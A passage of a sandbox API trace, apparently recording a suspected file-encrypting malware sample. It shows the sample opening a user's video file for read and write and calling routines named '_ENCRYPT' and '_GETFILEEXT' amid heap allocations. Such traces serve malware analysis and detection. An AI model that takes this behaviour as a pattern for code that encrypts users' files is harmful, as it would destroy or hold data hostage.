Flags=0x0, Size=0x4) returned 0x7af588 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0042.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0042.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4", lpUsedDefaultChar=0x0) returned 69 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.627] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\yqgdwwozy63yzvixse8a.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c3818 [0042.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=69, lpWideCharStr=0x7c3818, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4") returned 69 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.629] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.631] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.631] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.632] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0042.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.633] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.633] CloseHandle (hObject=0x140) returned 1 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.633] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.634] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.634] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.634] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.634] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.634] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.635] CompareStringW (Locale=0x400, 